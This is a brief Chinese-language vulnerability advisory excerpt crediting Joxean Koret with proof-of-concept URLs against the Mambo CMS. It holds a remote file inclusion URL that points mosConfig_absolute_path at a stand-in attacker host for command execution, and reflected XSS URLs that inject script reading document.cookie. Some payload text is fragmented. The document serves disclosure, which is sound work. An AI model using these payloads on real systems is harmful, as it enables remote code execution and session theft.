No description provided by source.
Joxean Koret ([email protected])提供了如下测试方法:
命令执行:
http://[target]/includes/Cache/Lite/Function.php?mosConfig_absolute_path=http://[attacker]/
跨站脚本执行:
http://[target]/index.php?option=com_content&task=view&id=18&Itemi d=39"><script>alert(document.cookie)&a&
%20I%20am%20an%20XSS%
20Problem</h1><br><br><br><br><br><br><br><br><br><br><br><br><br><&
http://<site-with-mambo>/index.php?option=com_content&task=view&id=15&Itemid=2&limit=1">&lt;script&gt;alert(document.cookie)&lt;/script&gt;&limitstart=1